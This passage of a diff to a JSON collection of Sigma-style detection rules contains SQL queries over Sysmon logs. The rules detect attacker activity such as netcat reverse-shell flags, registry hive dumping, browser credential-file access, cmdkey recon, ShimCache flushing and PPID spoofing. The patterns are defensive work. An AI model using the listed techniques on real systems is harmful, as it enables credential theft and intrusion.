AND NOT (((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_webshell_recon_detection.yml" + "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" }, { - "title": "Potential CVE-2021-26857 Exploitation Attempt", - "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", - "status": "stable", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", - "author": "Bhabesh Raj", + "title": "Suspicious Where Execution", + "id": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", + "status": "experimental", + "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser 
bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26857" + "attack.discovery", + "attack.t1217" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((Image LIKE '%wermgr.exe' ESCAPE '\\' OR Image LIKE '%WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\where.exe' ESCAPE '\\' OR OriginalFileName = 'where.exe') AND (CommandLine LIKE '%places.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%formhistory.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%logins.json%' ESCAPE '\\' OR CommandLine LIKE '%key4.db%' ESCAPE '\\' OR CommandLine LIKE '%key3.db%' ESCAPE '\\' OR CommandLine LIKE '%sessionstore.jsonlz4%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Login Data%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" + "filename": "proc_creation_win_where_browser_data_recon.yml" }, { - "title": "Abusing Findstr for Defense Evasion", - "id": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", - "status": "test", - "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", + "title": "DLL Loaded via CertOC.EXE", + "id": "242301bc-f92f-4476-8718-78004a6efd9f", 
+ "status": "experimental", + "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.t1564.004", - "attack.t1552.001", - "attack.t1105" + "attack.t1218" ], "falsepositives": [ - "Administrative findstr usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%findstr%' ESCAPE '\\' OR Image LIKE '%findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (((CommandLine LIKE '% /v %' ESCAPE '\\' OR CommandLine LIKE '% -v %' ESCAPE '\\') AND (CommandLine LIKE '% /l %' ESCAPE '\\' OR CommandLine LIKE '% -l %' ESCAPE '\\')) OR ((CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '% -s %' ESCAPE '\\') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% -i %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_findstr.yml" + "filename": "proc_creation_win_certoc_load_dll.yml" }, { - "title": "Potential Rundll32 Execution With DLL Stored In ADS", - "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", + "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", "status": "experimental", - "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", - "author": "Harjot Singh, '@cyb3rjy0t'", + "description": "Detects usage of cmdkey to look for cached credentials on the system", + "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", 
"tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" + "filename": "proc_creation_win_cmdkey_recon.yml" }, { - "title": "NtdllPipe Like Activity Execution", - "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", - "status": "test", - "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. 
As seen being used in the POC NtdllPipe", + "title": "Suspicious GrpConv Execution", + "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", + "status": "experimental", + "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" + "filename": "proc_creation_win_lolbin_susp_grpconv.yml" }, { - "title": "ShimCache Flush", - "id": "b0524451-19af-4efa-a46f-562a977f792e", - "status": "stable", - "description": "Detects actions that clear the local ShimCache and remove forensic evidence", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], + "title": "Execution of Powershell Script in Public Folder", + "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "status": "experimental", + "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", + "author": "Max Altgelt (Nextron Systems)", "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + "filename": "proc_creation_win_powershell_public_folder.yml" }, { - "title": "Renamed Vmnat.exe Execution", - "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "title": "DLL Sideloading by Microsoft Defender", + "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", "status": "experimental", - "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", - "author": "elhoim", + "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary 
DLL", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", "attack.t1574.002" 
@@ -14675,1929 +14350,1873 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'vmnat.exe' AND NOT ((Image LIKE '%vmnat.exe' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_renamed_vmnat.yml" - }, - { - "title": "Dumping of Sensitive Hives Via Reg.EXE", - "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", - "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", - "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "car.2013-07-001" - ], - "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" + "SELECT * 
FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" + "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" }, { - "title": "Lazarus System Binary Masquerading", - "id": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", + "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", + "id": "52ff7941-8211-46f9-84f8-9903efb7077d", "status": "test", - "description": "Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location", - "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.005" + "attack.t1134.004" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' OR Image LIKE '%\\\\gpsvc.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' 
ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_lazarus_binary_masquerading.yml" + "filename": "proc_creation_win_hktl_selectmyparent.yml" }, { - "title": "HackTool - Bloodhound/Sharphound Execution", - "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "title": "Renamed SysInternals DebugView Execution", + "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", "status": "test", - "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "description": "Detects suspicious renamed SysInternals DebugView execution", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Other programs that use these command line option and accepts an 'All' parameter" + "Unknown" ], 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (Image LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" + "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" }, { - "title": "PUA - Netcat Suspicious Execution", - "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", - "status": "experimental", - "description": "Detects execution of Netcat. 
Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "author": "frack113, Florian Roth (Nextron Systems)", + "title": "Curl.EXE Execution", + "id": "bbeaed61-1990-4773-bf57-b81dbad7db2d", + "status": "test", + "description": "Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1095" + "attack.t1105" ], "falsepositives": [ - "Legitimate ncat use" + "Scripts created by developers and admins", + "Administrative activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nc.exe' ESCAPE '\\' OR Image LIKE '%\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable'))" ], - "filename": "proc_creation_win_pua_netcat.yml" + "filename": "proc_creation_win_curl_execution.yml" }, { - "title": "New User Created Via Net.EXE With Never Expire Option", - "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", + "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", "status": "test", - "description": "Detects creation of local 
users via the net.exe command with the option \"never expire\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", + "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_net_user_add_never_expire.yml" + "filename": "proc_creation_win_lolbin_manage_bde.yml" }, { - "title": "Suspicious Execution of InstallUtil To Download", - "id": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", + "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", + "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", "status": "experimental", - "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. 
The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", + "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR OriginalFileName = 'InstallUtil.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_installutil_download.yml" + "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" }, { - "title": "Suspicious Diantz Alternate Data Stream Execution", - "id": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", - "status": "test", - "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", - "author": "frack113", + "title": "Wscript Shell Run In CommandLine", + "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "status": "experimental", + "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", 
"tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Very Possible" + "Rare legitimate inline scripting by some administrators" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_diantz_ads.yml" + "filename": "proc_creation_win_script_wscript_shell_cli.yml" }, { - "title": "Suspicious Key Manager Access", - "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", + "title": "Pubprn.vbs Proxy Execution", + "id": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", "status": "experimental", - "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.defense_evasion", + "attack.t1216.001" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\pubprn.vbs%' ESCAPE '\\' AND CommandLine LIKE 
'%script:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_keymgr.yml" + "filename": "proc_creation_win_lolbin_pubprn.yml" }, { - "title": "Remote Code Execute via Winrm.vbs", - "id": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", - "status": "test", - "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", - "author": "Julia Fomina, oscd.community", + "title": "Potential Process Injection Via Msra.EXE", + "id": "744a188b-0415-4792-896f-11ddb0588dbc", + "status": "experimental", + "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", + "author": "Alexander McDonald", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Legitimate use of Msra.exe" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR OriginalFileName = 'cscript.exe') AND (CommandLine LIKE '%winrm%' ESCAPE '\\' AND CommandLine LIKE '%invoke Create wmicimv2/Win32\\_%' ESCAPE '\\' AND CommandLine LIKE '%-r:http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\route.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": 
